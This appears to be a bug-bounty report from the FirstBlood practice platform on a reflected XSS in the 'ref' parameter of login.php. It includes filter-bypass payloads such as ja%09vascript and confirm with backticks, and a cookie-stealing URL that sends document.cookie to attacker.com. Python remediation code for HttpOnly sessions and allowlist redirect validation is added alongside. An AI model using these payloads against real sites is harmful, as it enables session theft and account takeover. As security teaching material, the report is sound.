FirstBlood-#154 Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter



On 2021-05-10, holybugx reported:

Description

Hello Sean,

I found out that there is a reflected XSS on the /login.php endpoint through the vulnerable ref parameter which leads to account takeover.

Steps to reproduce

  1. Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
  2. Click on "Return to previous page" and the XSS pops up.

Filter bypass

I found out that certain keywords are being blocked and removed. I realized the javascript keyword is being removed, so I tried a couple of encoding tricks such as java%09script, but then I realized that with this payload the java keyword is removed; I also realized the alert keyword and ( are being removed.

I used the following tricks to bypass the filtering:

  • javascript --> ja%09vascript
  • alert --> confirm
  • ( ) --> ``

Bypass explanation

  • You can use multiple encoding/unicoding tricks to bypass the javascript keyword being removed; examples of such are:
      ja%09vascript
      ja%0avascript
      ja%0dvascript
  • You can use confirm or prompt if keywords such as alert are blocked.

  • When parentheses are filtered you can either use ` ` as I did, or in some cases you can use encoding tricks such as HTML encoding or URL encoding/double URL encoding.

confirm(1) --> confirm`1`

Exploitation

An attacker can craft a payload to steal cookies, an example of such payload is:

http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60

Where http://attacker.com is the attacker's domain, opening the above link and clicking on the Return to previous page results in a redirection to the attacker's domain and the cookies will be sent to the attacker's server.

An attacker can set this cookie on his browser to access drAdmin (Administrator).

This happens because of two cookie misconfigurations:

  1. Cookies are not set as httponly, which makes it possible for an attacker to steal cookies using javascript.

  2. Cookies are not deleted/expired as they are meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.

Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
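The two cookie problems above are easier to see side by side in code. The following is an added example, not the FirstBlood application's code: a hypothetical in-memory session store where `login` issues the `drps` cookie (name taken from the Set-Cookie line above) with HttpOnly, `logout` invalidates the session on the server before sending the deletion header, and `weak_logout` reproduces the reported behaviour of clearing the browser cookie while leaving the server-side session usable. The cookie attributes, TTL and user names are assumptions.

```python
import secrets
import time
from http.cookies import SimpleCookie
from typing import Dict, Optional, Tuple

# Hypothetical in-memory session store (assumption; not the application's code).
# Maps the opaque cookie value to the logged-in user and a creation timestamp.
_SESSIONS: Dict[str, dict] = {}
SESSION_COOKIE = "drps"   # cookie name from the report's Set-Cookie line
SESSION_TTL = 3600        # assumed lifetime in seconds


def login(username: str) -> Tuple[str, str]:
    """Create a server-side session; return (token, Set-Cookie header value)."""
    token = secrets.token_urlsafe(32)
    _SESSIONS[token] = {"user": username, "created": time.time()}
    cookie = SimpleCookie()
    cookie[SESSION_COOKIE] = token
    cookie[SESSION_COOKIE]["httponly"] = True   # document.cookie cannot read it
    cookie[SESSION_COOKIE]["secure"] = True
    cookie[SESSION_COOKIE]["samesite"] = "Lax"
    cookie[SESSION_COOKIE]["path"] = "/"
    cookie[SESSION_COOKIE]["max-age"] = SESSION_TTL
    # output(header="") yields " drps=...; HttpOnly; Max-Age=3600; Path=/; ..."
    return token, cookie.output(header="").strip()


def current_user(token: Optional[str]) -> Optional[str]:
    """Resolve a presented cookie value to a user; None means not logged in."""
    sess = _SESSIONS.get(token or "")
    if sess is None or time.time() - sess["created"] > SESSION_TTL:
        _SESSIONS.pop(token or "", None)
        return None
    return sess["user"]


def logout(token: str) -> str:
    """Invalidate the session server-side, then tell the browser to drop the cookie."""
    _SESSIONS.pop(token, None)
    return (f"{SESSION_COOKIE}=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; "
            "Max-Age=0; path=/; HttpOnly; Secure; SameSite=Lax")


def weak_logout(token: str) -> str:
    """The reported pattern: the browser cookie is cleared but the server keeps
    the session, so a copy of the cookie value keeps working."""
    return (f"{SESSION_COOKIE}=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; "
            "Max-Age=0; path=/")


if __name__ == "__main__":
    tok, header = login("drAdmin")
    print("Set-Cookie:", header)
    print("before logout:", current_user(tok))
    print("Set-Cookie:", logout(tok))
    print("after logout:", current_user(tok))
```

With `weak_logout`, a token captured before logout still resolves to the user afterwards; with `logout`, the same token resolves to nothing, which is the property the report says is missing.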

Remediation

  1. The ref parameter should not be controlled by users.
  2. Preferably set httponly cookies so that javascript can not be used to steal cookies.
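To show why the keyword-removal approach described in the report fails and what the first remediation point looks like in practice, here is an added example (not the FirstBlood code, whose real filter is not on the page). `strip_filter` is a hypothetical reconstruction of a substring-removal filter, and `safe_redirect_target` is an allowlist validator that only accepts same-site relative paths or absolute URLs on `firstbloodhackers.com` (the host from the report's URLs) and falls back to `/` otherwise. It takes the parameter value as the application sees it after the framework's single URL decode, so `%09` has already become a tab.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# --- The pattern the report describes: delete known-bad substrings ------------
# Hypothetical reconstruction (assumption); the page does not show the real filter.
BLOCKED = ("javascript", "alert", "(", ")")


def strip_filter(ref: str) -> str:
    """Remove blocked substrings. A tab inside 'javascript' defeats this outright."""
    out = ref
    for word in BLOCKED:
        out = out.replace(word, "")
    return out


# --- Allowlist validation of the redirect target -------------------------------
ALLOWED_HOSTS = {"firstbloodhackers.com"}   # host from the report's URLs
FALLBACK = "/"
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def safe_redirect_target(ref: Optional[str]) -> str:
    """Return ref only if it is a same-site destination; otherwise FALLBACK."""
    if not ref:
        return FALLBACK
    # Browsers ignore tab/CR/LF while parsing a scheme, which is exactly what the
    # ja%09vascript / ja%0avascript / ja%0dvascript variants rely on. Remove them
    # first so the scheme we inspect is the one the browser would act on.
    candidate = _CONTROL_CHARS.sub("", ref)
    parts = urlsplit(candidate)

    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: accept a normal path, reject protocol-relative
        # ("//evil") and backslash ("/\evil") forms that browsers treat as hosts.
        if candidate.startswith("/") and not candidate.startswith(("//", "/\\")):
            return candidate
        return FALLBACK

    # Absolute URL: only http(s) and only an allowlisted host. hostname (not
    # netloc) is compared so "user@host" and port tricks cannot spoof it.
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return candidate
    return FALLBACK


if __name__ == "__main__":
    payload = "ja\tvascript:confirm`1`"   # decoded form of the report's ref value
    print("strip_filter  :", repr(strip_filter(payload)))
    print("allowlist     :", safe_redirect_target(payload))
    print("legit relative:", safe_redirect_target("/account.php?tab=1"))
```

The allowlist check does not try to enumerate bad strings at all, so the `confirm`/`prompt` and backtick substitutions the report lists never matter: anything that is not a same-site destination is replaced by the fallback.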

Impact

  • Account takeover

Best regards,

HolyBugx

P3 Medium

FirstBlood ID: 3
Vulnerability Type: Reflective XSS

The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.


Respect Earnt: 1500000